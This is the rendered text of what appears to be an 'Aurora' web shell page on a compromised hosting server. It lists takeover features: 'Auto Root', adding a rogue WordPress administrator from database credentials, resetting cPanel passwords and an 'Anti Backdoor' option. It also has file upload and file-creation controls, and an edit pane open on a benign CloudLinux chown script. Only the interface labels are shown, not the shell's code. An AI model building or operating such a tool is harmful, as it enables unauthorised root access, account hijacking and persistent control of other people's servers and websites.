Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
bin
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: cl-linksafe-apply-group
#!/usr/bin/bash # Created: Sergey Fokin <sfokin@cloudlinux.com> # Date: 05.06.2022 _linksafe_grp=linksafe if [ -n "$1" ]; then if [ -f /etc/cloudlinux-edition-solo ] || [ -f /etc/cloudlinux-container ]; then _linksafe_grp=root fi if [ -x /usr/bin/apt ]; then listFiles=$(dpkg -L $1) elif [ -x /usr/bin/yum ]; then listFiles=$(rpm -ql $1) fi for _f in ${listFiles}; do if [[ ${_f} =~ "/opt/alt/" ]]; then chown -h root:${_linksafe_grp} ${_f} 1>/dev/null 2>/dev/null fi done fi